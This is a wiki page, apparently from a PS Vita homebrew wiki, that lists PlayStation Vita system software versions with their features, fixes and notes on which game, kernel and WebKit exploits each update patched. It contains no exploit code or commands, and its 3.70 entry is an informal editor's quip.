* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several Game Exploits, Fieldrunners and others, that were actually undisclosed, got fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the reserved 256MB memory for the operating system now free for games.<br />
|-<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploit.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that uses SceSsl), two new root certificates added<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=9108System Software2018-12-01T23:57:47Z<p>Xyz: </p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
